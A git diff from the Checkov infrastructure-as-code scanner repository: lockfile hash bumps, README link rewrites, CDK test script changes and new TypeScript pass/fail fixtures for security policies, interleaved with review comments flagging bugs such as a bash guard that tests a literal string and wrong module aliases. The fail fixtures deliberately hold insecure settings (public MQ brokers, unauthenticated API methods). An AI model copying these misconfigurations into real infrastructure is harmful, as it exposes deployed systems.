@@ -3055,11 +3048,11 @@ }, "virtualenv": { "hashes": [ - "sha256:4238949c5ffe6876362d9c0180fc6c3a824a7b12b80604eeb8085f2ed7460de3", - "sha256:bf51c0d9c7dd63ea8e44086fa1e4fb1093a31e963b86959257378aef020e1f1b" + "sha256:4c43a2a236279d9ea36a0d76f98d84bd6ca94ac4e0f4a3b9d46d05e10fea542a", + "sha256:8cc4a31139e796e9a7de2cd5cf2489de1217193116a8fd42328f1bd65f434589" ], "markers": "python_version >= '3.7'", - "version": "==20.25.0" + "version": "==20.26.3" }, "yarl": { "hashes": [ @@ -3160,11 +3153,11 @@ }, "zipp": { "hashes": [ - "sha256:0e923e726174922dce09c53c59ad483ff7bbb8e572e00c7f7c46b88556409f31", - "sha256:84e64a1c28cf7e91ed2078bb8cc8c259cb19b76942096c8d7b84947690cabaf0" + "sha256:bf1dcf6450f873a13e952a29504887c89e6de7506209e5b1bcc3460135d4de19", + "sha256:f091755f667055f2d02b32c53771a7a6c8b47e1fdbc4b72a8b9072b3eef8015c" ], "markers": "python_version >= '3.8'", - "version": "==3.17.0" + "version": "==3.19.2" } } } diff --git a/README.md b/README.md index 50c0a4c9401..0832d28e78b 100644 --- a/README.md +++ b/README.md 
@@ -15,7 +15,7 @@
 **Checkov** is a static code analysis tool for infrastructure as code (IaC) and also a software composition analysis (SCA) tool for images and open source packages.
-It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](docs/7.Scan%20Examples/Helm.md), [Kustomize](docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](docs/7.Scan%20Examples/Dockerfile.md), [Serverless](docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](docs/7.Scan%20Examples/Bicep.md), [OpenAPI](docs/7.Scan%20Examples/OpenAPI.md) or [ARM Templates](docs/7.Scan%20Examples/Azure%20ARM%20templates.md) and detects security and compliance misconfigurations using graph-based scanning.
+It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), 
[OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md) or [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md) and detects security and compliance misconfigurations using graph-based scanning.
 It performs [Software Composition Analysis (SCA) scanning](docs/7.Scan%20Examples/Sca.md) which is a scan of open source packages and images for Common Vulnerabilities and Exposures (CVEs). 
@@ -37,21 +37,21 @@ Checkov also powers [**Prisma Cloud Application Security**](https://www.prismacl
 - [Getting Started](#getting-started)
 - [Disclaimer](#disclaimer)
 - [Support](#support)
-- [Migration - v2 to v3](docs/1.Welcome/Migration.md)
+- [Migration - v2 to v3](https://github.com/bridgecrewio/checkov/blob/main/docs/1.Welcome/Migration.md)
 ## Features
- * [Over 1000 built-in policies](docs/5.Policy%20Index/all.md) cover security and compliance best practices for AWS, Azure and Google Cloud.
+ * [Over 1000 built-in policies](https://github.com/bridgecrewio/checkov/blob/main/docs/5.Policy%20Index/all.md) cover security and compliance best practices for AWS, Azure and Google Cloud.
 * Scans Terraform, Terraform Plan, Terraform JSON, CloudFormation, AWS SAM, Kubernetes, Helm, Kustomize, Dockerfile, Serverless framework, Ansible, Bicep and ARM template files.
 * Scans Argo Workflows, Azure Pipelines, BitBucket Pipelines, Circle CI Pipelines, GitHub Actions and GitLab CI workflow files
 * Supports Context-awareness policies based on in-memory graph-based scanning.
 * Supports Python format for attribute policies and YAML format for both attribute and composite policies.
- * Detects [AWS credentials](docs/2.Basics/Scanning%20Credentials%20and%20Secrets.md) in EC2 Userdata, Lambda environment variables and Terraform providers.
+ * Detects [AWS credentials](https://github.com/bridgecrewio/checkov/blob/main/docs/2.Basics/Scanning%20Credentials%20and%20Secrets.md) in EC2 Userdata, Lambda environment variables and Terraform providers.
 * [Identifies secrets](https://www.prismacloud.io/prisma/cloud/secrets-security) using regular expressions, keywords, and entropy based detection.
 * Evaluates [Terraform Provider](https://registry.terraform.io/browse/providers) settings to regulate the creation, management, and updates of IaaS, PaaS or SaaS managed through Terraform. 
- * Policies support evaluation of [variables](docs/2.Basics/Handling%20Variables.md) to their optional default value.
- * Supports in-line [suppression](docs/2.Basics/Suppressing%20and%20Skipping%20Policies.md) of accepted risks or false-positives to reduce recurring scan failures. Also supports global skip from using CLI.
- * [Output](docs/2.Basics/Reviewing%20Scan%20Results.md) currently available as CLI, [CycloneDX](https://cyclonedx.org), JSON, JUnit XML, CSV, SARIF and github markdown and link to remediation [guides](https://docs.prismacloud.io/en/enterprise-edition/policy-reference/).
+ * Policies support evaluation of [variables](https://github.com/bridgecrewio/checkov/blob/main/docs/2.Basics/Handling%20Variables.md) to their optional default value.
+ * Supports in-line [suppression](https://github.com/bridgecrewio/checkov/blob/main/docs/2.Basics/Suppressing%20and%20Skipping%20Policies.md) of accepted risks or false-positives to reduce recurring scan failures. Also supports global skip from using CLI.
+ * [Output](https://github.com/bridgecrewio/checkov/blob/main/docs/2.Basics/Reviewing%20Scan%20Results.md) currently available as CLI, [CycloneDX](https://cyclonedx.org), JSON, JUnit XML, CSV, SARIF and github markdown and link to remediation [guides](https://docs.prismacloud.io/en/enterprise-edition/policy-reference/).
 ## Screenshots
@@ -66,7 +66,7 @@ Scheduled scan result in Jenkins
 ## Getting started
 ### Requirements
- * Python >= 3.7 (Data classes are available for Python 3.7+)
+ * Python >= 3.8 (Data classes are available for Python 3.8+)
 * Terraform >= 0.12
 ### Installation 
@@ -172,7 +172,7 @@ Check: "Ensure all data stored in the S3 bucket is securely encrypted at rest"
 Failed for resource: aws_s3_bucket.sls_deployment_bucket_name
 ```
-Start using Checkov by reading the [Getting Started](docs/1.Welcome/Quick%20Start.md) page.
+Start using Checkov by reading the [Getting Started](https://github.com/bridgecrewio/checkov/blob/main/docs/1.Welcome/Quick%20Start.md) page.
 ### Using Docker
@@ -251,14 +251,14 @@ checkov -d . --skip-check kube-system
 Run a scan of a container image. First pull or build the image then refer to it by the hash, ID, or name:tag:
 ```sh
-checkov --framework sca_image --docker-image sha256:1234example --dockerfile-path /Users/path/to/Dockerfile --bc-api-key ...
+checkov --framework sca_image --docker-image sha256:1234example --dockerfile-path /Users/path/to/Dockerfile --repo-id ... --bc-api-key ...
-checkov --docker-image :tag --dockerfile-path /User/path/to/Dockerfile --bc-api-key ...
+checkov --docker-image :tag --dockerfile-path /User/path/to/Dockerfile --repo-id ... --bc-api-key ...
 ```
 You can use --image flag also to scan container image instead of --docker-image for shortener:
 ```sh
-checkov --image :tag --dockerfile-path /User/path/to/Dockerfile --bc-api-key ...
+checkov --image :tag --dockerfile-path /User/path/to/Dockerfile --repo-id ... --bc-api-key ...
 ```
 Run an SCA scan of packages in a repo: 
@@ -278,12 +278,12 @@ checkov -d .
 Run secrets scanning on all files in MyDirectory. Skip CKV_SECRET_6 check on json files that their suffix is DontScan
 ```sh
-checkov -d /MyDirectory --framework secrets --bc-api-key ... --skip-check CKV_SECRET_6:.*DontScan.json$
+checkov -d /MyDirectory --framework secrets --repo-id ... --bc-api-key ... --skip-check CKV_SECRET_6:.*DontScan.json$
 ```
 Run secrets scanning on all files in MyDirectory. Skip CKV_SECRET_6 check on json files that contains "skip_test" in path
 ```sh
-checkov -d /MyDirectory --framework secrets --bc-api-key ... --skip-check CKV_SECRET_6:.*skip_test.*json$
+checkov -d /MyDirectory --framework secrets --repo-id ... --bc-api-key ... --skip-check CKV_SECRET_6:.*skip_test.*json$
 ```
 One can mask values from scanning results by supplying a configuration file (using --config-file flag) with mask entry. 
@@ -462,13 +462,13 @@ Defaults:
 Contribution is welcomed!
-Start by reviewing the [contribution guidelines](CONTRIBUTING.md). After that, take a look at a [good first issue](https://github.com/bridgecrewio/checkov/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22).
+Start by reviewing the [contribution guidelines](https://github.com/bridgecrewio/checkov/blob/main/CONTRIBUTING.md). After that, take a look at a [good first issue](https://github.com/bridgecrewio/checkov/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22).
 You can even start this with one-click dev in your browser through Gitpod at the following link:
 [![Open in Gitpod](https://gitpod.io/button/open-in-gitpod.svg)](https://gitpod.io/#https://github.com/bridgecrewio/checkov)
-Looking to contribute new checks? Learn how to write a new check (AKA policy) [here](docs/6.Contribution/Contribution%20Overview.md).
+Looking to contribute new checks? Learn how to write a new check (AKA policy) [here](https://github.com/bridgecrewio/checkov/blob/main/docs/6.Contribution/Contribution%20Overview.md).
 ## Disclaimer
 `checkov` does not save, publish or share with anyone any identifiable customer information. 
@@ -483,4 +483,4 @@ To skip this API call use the flag `--skip-download`.
 Start with our [Documentation](https://www.checkov.io/1.Welcome/Quick%20Start.html) for quick tutorials and examples.
 ## Python Version Support
-We follow the official support cycle of Python, and we use automated tests for all supported versions of Python. This means we currently support Python 3.7 - 3.11, inclusive. Note that Python 3.7 is reaching EOL on June 2023. After that time, we will have a short grace period where we will continue 3.7 support until September 2023, and then it will no longer be considered supported for Checkov. If you run into any issues with any non-EOL Python version, please open an Issue.
+We follow the official support cycle of Python, and we use automated tests for all supported versions of Python. This means we currently support Python 3.8 - 3.11, inclusive. Note that Python 3.7 reached EOL on June 2023 and Python 3.8 will reach EOL in October 2024. If you run into any issues with any non-EOL Python version, please open an Issue.
diff --git a/cdk_integration_tests/prepare_data.sh b/cdk_integration_tests/prepare_data.sh
index 45417830a62..8d3934facf1 100755
--- a/cdk_integration_tests/prepare_data.sh
+++ b/cdk_integration_tests/prepare_data.sh
@@ -19,9 +19,8 @@
 # fi
 #done
-
-echo "creating report for CDK python"
+echo "creating report for CDK"
 pipenv run checkov -s --framework cdk --repo-id cli/cdk -o json \
- -d "cdk_integration_tests/src/python" > "checkov_report_cdk_python.json"
+ -d "cdk_integration_tests/src" > "checkov_report_cdk.json"
 #todo: iterate over all the cdk typescript checks - when ts supported in sast
diff --git a/cdk_integration_tests/run_integration_tests.sh b/cdk_integration_tests/run_integration_tests.sh
index 832bb498156..24d4858dfc8 100755
--- a/cdk_integration_tests/run_integration_tests.sh
+++ b/cdk_integration_tests/run_integration_tests.sh
@@ -18,9 +18,9 @@ set_env_vars() {
 }
 prepare_data () {
- echo "creating report for CDK python"
+ echo "creating report for CDK"
 python checkov/main.py -s --framework cdk --repo-id prisma/cdk -o json \
- -d "cdk_integration_tests/src/python" > "checkov_report_cdk_python.json"
+ -d "cdk_integration_tests/src" > "checkov_report_cdk.json"
 }
@@ -30,8 +30,8 @@ delete_reports () {
 rm checkov_checks_list.txt
 }
-echo "calling set_env_vars"
-set_env_vars
+#echo "calling set_env_vars"
+#set_env_vars
 if [[ -z "BC_API_KEY" ]]; then
 echo "BC_API_KEY is missing."
diff --git a/cdk_integration_tests/src/typescript/ALBDropHttpHeaders/fail.ts b/cdk_integration_tests/src/typescript/ALBDropHttpHeaders/fail.ts
new file mode 100644
index 00000000000..a56c4784d2e
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ALBDropHttpHeaders/fail.ts
@@ -0,0 +1,17 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class ALBDropHttpHeadersStack extends Stack {
+ constructor(scope: Construct, id: string, props?: StackProps) {
+ super(scope, id, props);
+
+ new elbv2.CfnLoadBalancer(this, { type: 'not_application', loadBalancerAttributes: [{'key': 'routing.http.drop_invalid_header_fields.enabled', 'value': 'true'}] })
+ new elbv2.CfnLoadBalancer(this, { type: 'application', loadBalancerAttributes: [{'value': 'false', 'key': 'routing.http.drop_invalid_header_fields.enabled'}] })
+ new elbv2.CfnLoadBalancer(this, { loadBalancerAttributes: [{'key': 'routing.http.drop_invalid_header_fields.disable', 'value': 'true'}], type: 'application' })
+ new elbv2.CfnLoadBalancer(this, { loadBalancerAttributes: [], type: 'application' })
+ }
+}
+
+const app = new App();
+new ALBDropHttpHeadersStack(app, 'ALBDropHttpHeadersStack'); 
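Review bot: With `set_env_vars` commented out, the only thing left that checks for the API key is the guard directly below it, `if [[ -z "BC_API_KEY" ]]; then`, and that guard tests a literal string rather than the variable, so it can never fire and a missing key will only surface later as a failed scan; it should read `if [[ -z "$BC_API_KEY" ]]; then`. If the run now expects the caller to export the key, that expectation belongs in a one-line comment where the call used to be, e.g. `# BC_API_KEY must be exported by the caller (set_env_vars no longer runs)`, and the disabled call should be deleted rather than left as commented-out code. The `if` block continues outside the hunk.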
diff --git a/cdk_integration_tests/src/typescript/ALBDropHttpHeaders/pass.ts b/cdk_integration_tests/src/typescript/ALBDropHttpHeaders/pass.ts
new file mode 100644
index 00000000000..c337d29d196
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ALBDropHttpHeaders/pass.ts
@@ -0,0 +1,17 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class ALBDropHttpHeadersStack extends Stack {
+ constructor(scope: Construct, id: string, props?: StackProps) {
+ super(scope, id, props);
+
+ new elbv2.CfnLoadBalancer(this, { type: 'application', loadBalancerAttributes: [{'key': 'routing.http.drop_invalid_header_fields.enabled', 'value': 'true'}] })
+ new elbv2.CfnLoadBalancer(this, { type: 'application', loadBalancerAttributes: [{'value': 'true', 'key': 'routing.http.drop_invalid_header_fields.enabled'}] })
+ new elbv2.CfnLoadBalancer(this, { loadBalancerAttributes: [{'key': 'routing.http.drop_invalid_header_fields.enabled', 'value': 'true'}], type: 'application' })
+ new elbv2.CfnLoadBalancer(this, { loadBalancerAttributes: [{'value': 'true', 'key': 'routing.http.drop_invalid_header_fields.enabled'}], type: 'application' })
+ }
+}
+
+const app = new App();
+new ALBDropHttpHeadersStack(app, 'ALBDropHttpHeadersStack');
diff --git a/cdk_integration_tests/src/typescript/ALBListenerHTTPS/fail.ts b/cdk_integration_tests/src/typescript/ALBListenerHTTPS/fail.ts
new file mode 100644
index 00000000000..7d297878ad3
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ALBListenerHTTPS/fail.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class ALBListenerHTTPSStack extends Stack {
+ constructor(scope: Construct, id: string, props?: StackProps) {
+ super(scope, id, props);
+
+ new elbv2.CfnListener(this, {})
+ }
+}
+
+const app = new App();
+new ALBListenerHTTPSStack(app, 'ALBListenerHTTPSStack');
diff --git a/cdk_integration_tests/src/typescript/ALBListenerHTTPS/pass.ts b/cdk_integration_tests/src/typescript/ALBListenerHTTPS/pass.ts
new file mode 100644
index 00000000000..ce4c92e42e2
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ALBListenerHTTPS/pass.ts
@@ -0,0 +1,19 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class ALBListenerHTTPSStack extends Stack {
+ constructor(scope: Construct, id: string, props?: StackProps) {
+ super(scope, id, props);
+
+ new elbv2.CfnListener(this, {protocol: 'HTTPS'})
+ new elbv2.CfnListener(this, {protocol: 'TLS'})
+ new elbv2.CfnListener(this, {protocol: 'TCP'})
+ new elbv2.CfnListener(this, {protocol: 'UDP'})
+ new elbv2.CfnListener(this, {protocol: 'TCP_UDP'})
+ new elbv2.CfnListener(this, {defaultActions: [{type: 'redirect', redirectConfig:{protocol: 'HTTPS'}}]})
+ }
+}
+
+const app = new App();
+new ALBListenerHTTPSStack(app, 'ALBListenerHTTPSStack');
diff --git a/cdk_integration_tests/src/typescript/APIGatewayAccessLogging/fail.ts b/cdk_integration_tests/src/typescript/APIGatewayAccessLogging/fail.ts
new file mode 100644
index 00000000000..8087b05b326
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayAccessLogging/fail.ts
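Review bot: The `TCP`, `UDP` and `TCP_UDP` listeners in the `ALBListenerHTTPS/pass.ts` hunk are plaintext protocols, and nothing in the fixture says why they are expected to pass a check about HTTPS listeners; presumably the policy treats them as network-load-balancer protocols outside its scope, as the CloudFormation version of this check does, but that reasoning lives only in the reviewer's head. A comment above those three lines, e.g. `// TCP/UDP/TCP_UDP are NLB listener protocols, out of scope for this ALB check`, would stop a later reader from "fixing" the fixture by moving them to the fail file. The redirect case on the last listener is the only one exercising `defaultActions`; a matching fail case with `redirectConfig:{protocol: 'HTTP'}` would pin that branch as well.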
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { apigateway as api } from 'aws-cdk-lib';
+
+class APIGatewayAccessLoggingStack extends Stack {
+ constructor(scope: Construct, id: string, props?: StackProps) {
+ super(scope, id, props);
+
+ new api.CfnStage(this, {})
+ }
+}
+
+const app = new App();
+new APIGatewayAccessLoggingStack(app, 'APIGatewayAccessLoggingStack');
diff --git a/cdk_integration_tests/src/typescript/APIGatewayAccessLogging/pass.ts b/cdk_integration_tests/src/typescript/APIGatewayAccessLogging/pass.ts
new file mode 100644
index 00000000000..d62d584e4f0
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayAccessLogging/pass.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { apigateway as api } from 'aws-cdk-lib';
+
+class APIGatewayAccessLoggingStack extends Stack {
+ constructor(scope: Construct, id: string, props?: StackProps) {
+ super(scope, id, props);
+
+ new api.CfnStage(this, { accessLogSetting: { destinationArn: "1" }} )
+ }
+}
+
+const app = new App();
+new APIGatewayAccessLoggingStack(app, 'APIGatewayAccessLoggingStack');
diff --git a/cdk_integration_tests/src/typescript/APIGatewayAuthorization/fail.ts b/cdk_integration_tests/src/typescript/APIGatewayAuthorization/fail.ts
new file mode 100644
index 00000000000..2a1d6f28fa5
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayAuthorization/fail.ts
@@ -0,0 +1,14 @@
+// Import necessary AWS CDK packages
+import * as apigateway from '@aws-cdk/aws-apigateway';
+import { Resource } from '@aws-cdk/core';
+
+// Example resource and method declarations
+const resource: Resource = new Resource(); // Placeholder for actual resource initialization
+
+// Test cases for the policy patterns
+
+// This should match the first pattern and not be sanitized by the second pattern
+// SOURCE
+const method1 = resource.addMethod('GET', new apigateway.MockIntegration(), {
+  apiKeyRequired: false
+});
diff --git a/cdk_integration_tests/src/typescript/APIGatewayAuthorization/fail__2__.ts b/cdk_integration_tests/src/typescript/APIGatewayAuthorization/fail__2__.ts
new file mode 100644
index 00000000000..0e9e1e4dc93
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayAuthorization/fail__2__.ts
@@ -0,0 +1,14 @@
+// Import necessary AWS CDK packages
+import * as apigateway from '@aws-cdk/aws-apigateway';
+import { Resource } from '@aws-cdk/core';
+
+// Example resource and method declarations
+const resource: Resource = new Resource(); // Placeholder for actual resource initialization
+
+// Test cases for the policy patterns
+
+// This should match the second pattern
+// SINK
+const method2 = resource.addMethod('POST', new apigateway.MockIntegration(), {
+  authorizationType: apigateway.AuthorizationType.NONE
+});
diff --git a/cdk_integration_tests/src/typescript/APIGatewayAuthorization/pass.ts b/cdk_integration_tests/src/typescript/APIGatewayAuthorization/pass.ts
new file mode 100644
index 00000000000..13c17e21457
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayAuthorization/pass.ts
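Review bot: `const resource: Resource = new Resource()` types the placeholder with `Resource` from `@aws-cdk/core`, which has no `addMethod` and whose constructor takes a scope and id; `addMethod` is declared on `apigateway.IResource`, so the fixture does not type-check as written. The same preamble is repeated in all four APIGatewayAuthorization fixtures, so it is worth fixing once and copying. At minimum the annotation should be the interface that carries the method, e.g. `const resource = {} as apigateway.IResource; // placeholder`, keeping the intent comment.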
@@ -0,0 +1,15 @@
+// Import necessary AWS CDK packages
+import * as apigateway from '@aws-cdk/aws-apigateway';
+import { Resource } from '@aws-cdk/core';
+
+// Example resource and method declarations
+const resource: Resource = new Resource(); // Placeholder for actual resource initialization
+
+// Test cases for the policy patterns
+
+// This should not match any pattern as it includes an authorization type
+// SANITIZER
+const method3 = resource.addMethod('PUT', new apigateway.MockIntegration(), {
+  authorizationType: apigateway.AuthorizationType.COGNITO,
+  apiKeyRequired: true
+});
diff --git a/cdk_integration_tests/src/typescript/APIGatewayAuthorization/pass__2__.ts b/cdk_integration_tests/src/typescript/APIGatewayAuthorization/pass__2__.ts
new file mode 100644
index 00000000000..a5ad8ffb022
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayAuthorization/pass__2__.ts
@@ -0,0 +1,13 @@
+// Import necessary AWS CDK packages
+import * as apigateway from '@aws-cdk/aws-apigateway';
+import { Resource } from '@aws-cdk/core';
+
+// Example resource and method declarations
+const resource: Resource = new Resource(); // Placeholder for actual resource initialization
+
+// Test cases for the policy patterns
+
+// This should not match any pattern as it includes an authorization type and is not open
+const method4 = resource.addMethod('DELETE', new apigateway.MockIntegration(), {
+  authorizationType: apigateway.AuthorizationType.IAM
+});
diff --git a/cdk_integration_tests/src/typescript/APIGatewayCacheEnable/fail.ts b/cdk_integration_tests/src/typescript/APIGatewayCacheEnable/fail.ts
new file mode 100644
index 00000000000..117192f083a
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayCacheEnable/fail.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class APIGatewayCacheEnableStack extends Stack {
+  constructor(scope: Construct, id: string, props?: StackProps) {
+    super(scope, id, props);
+
+    new elbv2.Stage(this, {})
+  }
+}
+
+const app = new App();
+new APIGatewayCacheEnableStack(app, 'APIGatewayCacheEnableStack');
diff --git a/cdk_integration_tests/src/typescript/APIGatewayCacheEnable/pass.ts b/cdk_integration_tests/src/typescript/APIGatewayCacheEnable/pass.ts
new file mode 100644
index 00000000000..af0eb47bb6d
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayCacheEnable/pass.ts
@@ -0,0 +1,13 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class APIGatewayCacheEnableStack extends Stack {
+  constructor(scope: Construct, id: string, props?: StackProps) {
+    super(scope, id, props);
+    new elbv2.Stage(this, { cacheClusterEnabled: true} )
+  }
+}
+
+const app = new App();
+new APIGatewayCacheEnableStack(app, 'APIGatewayCacheEnableStack');
diff --git a/cdk_integration_tests/src/typescript/APIGatewayV2AccessLogging/fail.ts b/cdk_integration_tests/src/typescript/APIGatewayV2AccessLogging/fail.ts
new file mode 100644
index 00000000000..20676ea815b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayV2AccessLogging/fail.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class APIGatewayV2AccessLoggingStack extends Stack {
+  constructor(scope: Construct, id: string, props?: StackProps) {
+    super(scope, id, props);
+
+    new elbv2.CfnApi(this, {})
+  }
+}
+
+const app = new App();
+new APIGatewayV2AccessLoggingStack(app, 'APIGatewayV2AccessLoggingStack');
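Review bot: `new elbv2.Stage(this, {})` in APIGatewayCacheEnable/fail.ts instantiates an API Gateway construct through the `aws_elasticloadbalancingv2` alias, which has no `Stage` class; the same copied template yields `elbv2.CfnApi` (APIGatewayV2AccessLogging), `elbv2.CfnStage` (APIGatewayXray), `elbv2.CfnBroker` (AmazonMQBrokerPublicAccess), `elbv2.CfnDBCluster` (AuroraEncryption), `elbv2.CfnBackupVault` (BackupVaultEncrypted) and `elbv2.CfnTrail` (CloudTrailLogValidation). If the policies key only on the bare construct name these fixtures still pass, but a pattern that later qualifies on the imported module would silently stop matching, and none of these files represents a stack that synthesizes. Each fixture should import the module the construct lives in, e.g. here `import { aws_apigateway as apigw } from 'aws-cdk-lib';` with `new apigw.Stage(this, 'Stage', {})`.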
diff --git a/cdk_integration_tests/src/typescript/APIGatewayV2AccessLogging/pass.ts b/cdk_integration_tests/src/typescript/APIGatewayV2AccessLogging/pass.ts
new file mode 100644
index 00000000000..156ea89ee4b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayV2AccessLogging/pass.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class APIGatewayV2AccessLoggingStack extends Stack {
+  constructor(scope: Construct, id: string, props?: StackProps) {
+    super(scope, id, props);
+
+    new elbv2.CfnApi(this, {accessLogSettings: {destinationArn: "1"}})
+  }
+}
+
+const app = new App();
+new APIGatewayV2AccessLoggingStack(app, 'APIGatewayV2AccessLoggingStack');
diff --git a/cdk_integration_tests/src/typescript/APIGatewayXray/fail.ts b/cdk_integration_tests/src/typescript/APIGatewayXray/fail.ts
new file mode 100644
index 00000000000..b2245e3ee9b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayXray/fail.ts
@@ -0,0 +1,15 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class APIGatewayXrayStack extends Stack {
+  constructor(scope: Construct, id: string, props?: StackProps) {
+    super(scope, id, props);
+
+    new elbv2.CfnStage(this, {})
+    new elbv2.CfnStage(this, {tracingEnabled: false})
+  }
+}
+
+const app = new App();
+new APIGatewayXrayStack(app, 'APIGatewayXrayStack');
diff --git a/cdk_integration_tests/src/typescript/APIGatewayXray/pass.ts b/cdk_integration_tests/src/typescript/APIGatewayXray/pass.ts
new file mode 100644
index 00000000000..0669da9aa33
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/APIGatewayXray/pass.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class APIGatewayXrayStack extends Stack {
+  constructor(scope: Construct, id: string, props?: StackProps) {
+    super(scope, id, props);
+
+    new elbv2.CfnStage(this, {tracingEnabled: true})
+  }
+}
+
+const app = new App();
+new APIGatewayXrayStack(app, 'APIGatewayXrayStack');
diff --git a/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/fail.ts b/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/fail.ts
new file mode 100644
index 00000000000..51042e67b97
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/fail.ts
@@ -0,0 +1,13 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class AmazonMQBrokerPublicAccessStack extends Stack {
+  constructor(scope: Construct, id: string, props?: StackProps) {
+    super(scope, id, props);
+    new elbv2.CfnBroker(this, {publiclyAccessible: true})
+  }
+}
+
+const app = new App();
+new AmazonMQBrokerPublicAccessStack(app, 'AmazonMQBrokerPublicAccessStack');
diff --git a/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/pass.ts b/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/pass.ts
new file mode 100644
index 00000000000..e9da3de07b5
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/pass.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class AmazonMQBrokerPublicAccessStack extends Stack {
+  constructor(scope: Construct, id: string, props?: StackProps) {
+    super(scope, id, props);
+    new elbv2.CfnBroker(this, {})
+    new elbv2.CfnBroker(this, {publiclyAccessible: false})
+  }
+}
+
+const app = new App();
+new AmazonMQBrokerPublicAccessStack(app, 'AmazonMQBrokerPublicAccessStack');
diff --git a/cdk_integration_tests/src/typescript/AppSyncFieldLevelLogs/fail.ts b/cdk_integration_tests/src/typescript/AppSyncFieldLevelLogs/fail.ts
